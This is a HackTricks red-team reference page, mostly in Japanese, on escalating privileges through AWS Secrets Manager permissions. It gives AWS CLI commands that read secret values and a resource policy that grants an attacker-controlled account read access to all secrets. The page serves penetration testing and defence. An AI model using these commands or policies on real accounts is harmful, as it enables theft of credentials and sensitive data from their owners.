AWS - Secrets Manager Privesc

Tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

Secrets Manager

secrets manager に関する詳細は以下を参照してください:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

この権限を持つ攻撃者は、AWS Secretsmanagerシークレット内に保存された値を取得できます。

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Potential Impact: AWS secrets manager service 内の高度に機密なデータへのアクセス。

Warning

Note that even with the secretsmanager:BatchGetSecretValue permission an attacker would also need secretsmanager:GetSecretValue to retrieve the sensitive secrets.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

前述の権限があれば、他のプリンシパル/アカウント(外部を含む)に対しシークレットへのアクセスを付与することが可能です。KMSキーで暗号化されたシークレットを読み取るには、ユーザーがKMSキーへのアクセス権も持っている必要がある点に注意してください(詳細は KMS Enum page)。

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}

Tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする